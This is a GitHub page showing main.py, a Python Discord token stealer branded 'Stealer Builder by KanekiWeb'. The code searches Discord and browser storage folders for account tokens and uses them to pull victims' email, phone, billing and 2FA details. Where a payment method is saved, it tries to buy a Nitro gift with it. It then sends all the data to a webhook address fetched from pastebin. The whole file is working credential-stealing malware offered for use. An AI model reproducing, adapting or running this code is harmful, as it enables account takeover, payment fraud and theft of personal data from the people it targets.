-
Notifications
You must be signed in to change notification settings - Fork 22
/
Copy pathmain.py
178 lines (168 loc) Β· 10.6 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
import os
for _ in range(2):
try:
import requests, json, re
except:
os.system("pip install requests >null")
class Stealer():
def __init__(self, webhook):
self.hook = webhook
self.tokens = []
def GetTokens(self):
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default",
'Lightcord' : ROAMING + "\\Lightcord",
'Opera GX' : ROAMING + "\\Opera Software\\Opera GX Stable",
'Amigo' : LOCAL + "\\Amigo\\User Data",
'Torch' : LOCAL + "\\Torch\\User Data",
'Kometa' : LOCAL + "\\Kometa\\User Data",
'Orbitum' : LOCAL + "\\Orbitum\\User Data",
'CentBrowser' : LOCAL + "\\CentBrowser\\User Data",
'7Star' : LOCAL + "\\7Star\\7Star\\User Data",
'Sputnik' : LOCAL + "\\Sputnik\\Sputnik\\User Data",
'Vivaldi' : LOCAL + "\\Vivaldi\\User Data\\Default",
'Chrome SxS' : LOCAL + "\\Google\\Chrome SxS\\User Data",
'Epic Privacy Browser' : LOCAL + "\\Epic Privacy Browser\\User Data",
'Microsoft Edge' : LOCAL + "\\Microsoft\\Edge\\User Data\\Default",
'Uran' : LOCAL + "\\uCozMedia\\Uran\\User Data\\Default",
'Iridium' : LOCAL + "\\Iridium\\User Data\\Default\\Local Storage\\leveld",
'Firefox' : ROAMING + "\\Mozilla\\Firefox\\Profiles",
}
for platform, path in PATHS.items():
path += "\\Local Storage\\leveldb"
if os.path.exists(path):
for file_name in os.listdir(path):
if file_name.endswith(".log") or file_name.endswith(".ldb") or file_name.endswith(".sqlite"):
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in re.findall(regex, line):
if token + " | " + platform not in self.tokens:
self.tokens.append(token + " | " + platform)
def getuserinfo(self, token):
try:
return requests.get("https://discordapp.com/api/v9/users/@me", headers={"content-type": "application/json", "authorization": token}).json()
except:return None
def buy_nitro(self, token):
try:
r = requests.get('https://discordapp.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': token})
if r.status_code == 200:
payment_source_id = r.json()[0]['id']
if '"invalid": ture' in r.text:
r = requests.post(f'https://discord.com/api/v6/store/skus/521847234246082599/purchase', headers={'Authorization': token}, json={'expected_amount': 1,'gift': True,'payment_source_id': payment_source_id})
return r.json()['gift_code']
except:return "None"
def RareFriend(self, token):
friends = ""
try:
req = requests.get("https://discord.com/api/v9/users/@me/relationships", headers={"content-type": "application/json", "authorization": token}).json()
for user in req:
badge = ""
if user["user"]["public_flags"] == 1:badge = "Staff"
elif user["user"]["public_flags"] == 2:badge = "Partner"
elif user["user"]["public_flags"] == 4:badge = "Hypesquad Events"
elif user["user"]["public_flags"] == 8:badge = "BugHunter 1"
elif user["user"]["public_flags"] == 512:badge = "Early"
elif user["user"]["public_flags"] == 16384:badge = "BugHunter 2"
elif user["user"]["public_flags"] == 131072:badge = "Developer"
else:badge = ""
if badge != "":friends += badge + " | " + user['id'] + "\n"
if friends == "":friends += "No Rare Friends"
return friends
except:return "None, Except Error"
def main(self):
embeds = []
for token_line in self.tokens:
try:
token = token_line.split(" | ")[0]
plateform = token_line.split(" | ")[1]
languages = {'da':'Danish, Denmark','de':'German, Germany','en-GB':'English, United Kingdom','en-US':'English, United States','es-ES':'Spanish, Spain','fr':'French, France','hr':'Croatian, Croatia','lt':'Lithuanian, Lithuania','hu':'Hungarian, Hungary','nl':'Dutch, Netherlands','no':'Norwegian, Norway','pl':'Polish, Poland','pt-BR':'Portuguese, Brazilian, Brazil','ro':'Romanian, Romania','fi':'Finnish, Finland','sv-SE':'Swedish, Sweden','vi':'Vietnamese, Vietnam','tr':'Turkish, Turkey','cs':'Czech, Czechia, Czech Republic','el':'Greek, Greece','bg':'Bulgarian, Bulgaria','ru':'Russian, Russia','uk':'Ukranian, Ukraine','th':'Thai, Thailand','zh-CN':'Chinese, China','ja':'Japanese','zh-TW':'Chinese, Taiwan','ko':'Korean, Korea'}
get_infos = self.getuserinfo(token)
username = get_infos["username"] + "#" + get_infos["discriminator"]
user_id = get_infos["id"]
user_avatar = get_infos["avatar"]
try:user_banner = get_infos["banner"]
except:user_banner = None
email = get_infos["email"] or "β"
phone = get_infos["phone"] or "β"
local = languages.get(get_infos["locale"])
bio = get_infos["bio"] or "β"
mmfa = get_infos["mfa_enabled"]
bbilling = bool(len(json.loads(requests.get("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers={"content-type": "application/json", "authorization": token}).text)) > 0)
if bbilling == True:billing = "βοΈ"
else:billing = "β"
if mmfa == True:mfa = "βοΈ"
else:mfa = "β"
badges = ""
flags = get_infos['flags']
if (flags == 1):badges += "Staff, "
if (flags == 2):badges += "Partner, "
if (flags == 4):badges += "Hypesquad Event, "
if (flags == 8):badges += "Green Bughunter, "
if (flags == 64):badges += "Hypesquad Bravery, "
if (flags == 128):badges += "HypeSquad Brillance, "
if (flags == 256):badges += "HypeSquad Balance, "
if (flags == 512):badges += "Early Supporter, "
if (flags == 16384):badges += "Gold BugHunter, "
if (flags == 131072):badges += "Verified Bot Developer, "
if (badges == ""):badges = "β"
try:
if get_infos["premium_type"] == "1" or get_infos["premium_type"] == 1:nitro_type = "βοΈ Nitro Classic"
elif get_infos["premium_type"] == "2" or get_infos["premium_type"] == 2:nitro_type = "βοΈ Nitro Boost"
else:nitro_type = "β No Nitro"
except:nitro_type = "β No Nitro"
nnitro_buyed = self.buy_nitro(token)
if nnitro_buyed == None:nitro_buyed = "β"
else:nitro_buyed = "βοΈ discord.gift/" + nnitro_buyed
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**__User Infos:__**",
"value": f"- __Username:__ `{username}`\n- __User ID:__ `{user_id}`\n- __Email:__ `{email}`\n- __Phone:__ `{phone}`\n- __Nitro Type:__ `{nitro_type}`\n- __Local:__ `{local}`\n- __Badges:__ `{badges}`\n- __Billing:__ `{billing}`\n- __A2F Enable:__ `{mfa}`"
},
{
"name": "__**About:**__",
"value": f"```{bio}```"
},
{
"name": "__**Token:**__",
"value": f"Plateform: **{plateform}**\n```\n{token}\n```"
},
{
"name": "__**Nitro Buy:**__",
"value": f"`{nitro_buyed}`"
},
{
"name": "__**Rare Friends:**__",
"value": f"```{self.RareFriend(token)}```"
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": f"https://cdn.discordapp.com/avatars/{user_id}/{user_avatar}"
},
"footer": {
"text": f"Stealer Builder by KanekiWeb - kanekiweb.tk",
"icon_url": f"https://cdn.discordapp.com/avatars/{user_id}/{user_avatar}"
},
"image": {
"url": f"https://cdn.discordapp.com/banners/{user_id}/{user_banner}?size=1024"
},
"thumbnail": {
"url": f"https://cdn.discordapp.com/avatars/{user_id}/{user_avatar}?size=1024"
}
}
embeds.append(embed)
except:pass
requests.post(self.hook, headers={"content-type": "application/json"}, data=json.dumps({"content": "","embeds": embeds,"username": "Stealer Builder","avatar_url": "https://cdn.discordapp.com/avatars/922450497074495539/a_c1738e5280f6e70487ef02d307c62a07?size=1024"}).encode())
Grabber = Stealer(requests.get("https://pastebin.com/raw/XXXXXXX").text)
Grabber.GetTokens()
Grabber.main()